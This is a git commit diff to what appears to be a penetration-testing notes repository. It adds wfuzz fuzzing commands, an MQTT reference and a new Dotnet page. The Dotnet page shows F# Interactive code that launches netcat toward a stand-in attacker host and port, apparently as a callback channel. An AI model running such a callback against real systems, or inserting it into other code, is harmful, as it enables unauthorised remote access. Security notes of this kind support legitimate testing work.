bump
This commit is contained in:
parent
3ffec99fcc
commit
9cd859fa25
|
@ -127,6 +127,20 @@ gobuster help dir
|
|||
|
||||
### Wfuzz
|
||||
|
||||
#### URLs with Wfuzz
|
||||
|
||||
* GET requests fuzzing with wfuzz
|
||||
```sh
|
||||
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u $ATTACKER_IP/FUZZ -t 100 --hh 0
|
||||
```
|
||||
|
||||
* POST requests fuzzing with wfuzz
|
||||
```sh
|
||||
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u $ATTACKER_IP/FUZZ -t 100 --hh 0 -X POST
|
||||
```
|
||||
|
||||
#### Parameters with Wfuzz
|
||||
|
||||
* Fuzz parameters
|
||||
```sh
|
||||
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt -X POST --hh 45 -u http://<target-IP>/api/items\?FUZZ\=test
|
||||
|
@ -135,5 +149,5 @@ wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt -X POST --
|
|||
#### DNS with Wfuzz
|
||||
|
||||
```sh
|
||||
wfuzz -H "Host: FUZZ.example.com" --hc 302,400 -t 50 -H "User-Agent: DEDSEC" -c -z file,"/usr/share/seclists/Discovery/Web-Content/namelist.txt" http://example.com
|
||||
wfuzz -H "Host: FUZZ.example.com" --hc 302,400 -t 50 -c -z file,"/usr/share/seclists/Discovery/Web-Content/namelist.txt" http://example.com
|
||||
```
|
||||
|
|
|
@ -24,3 +24,7 @@ mosquitto_sub -h <hostname> -t '#'
|
|||
```
|
||||
* `mosquitto_pub -h ` to publish to topics through mentioning the device ID. Can be send as raw, xml or json. `-f` for file sending
|
||||
* Base64 encoding
|
||||
|
||||
## References
|
||||
|
||||
* [Mosquitto usage](https://cedalo.com/blog/mqtt-subscribe-publish-mosquitto-pub-sub-example/)
|
||||
|
|
|
@ -0,0 +1,23 @@
|
|||
# Dotnet
|
||||
|
||||
## Run Dotnet on Linux
|
||||
|
||||
### Dotnet REPL
|
||||
|
||||
* Dotnet can be executed just in time via dotnet commandline tool. An example on how to use this follows
|
||||
```sh
|
||||
dotnet fsi
|
||||
|
||||
Microsoft (R) F# Interactive version 12.0.0.0 for F# 6.0
|
||||
Copyright (c) Microsoft Corporation. All Rights Reserved.
|
||||
|
||||
For help type #help;;
|
||||
|
||||
> open System.Diagnostics
|
||||
- let psi = new ProcessStartInfo("nc", "$ATTACKER_IP $ATTACKER_PORT")
|
||||
- psi.UseShellExecute <- false
|
||||
- let _proc = Process.Start(psi)
|
||||
- _proc.WaitForExit() |> ignore
|
||||
- #quit;;
|
||||
```
|
||||
|
Loading…
Reference in New Issue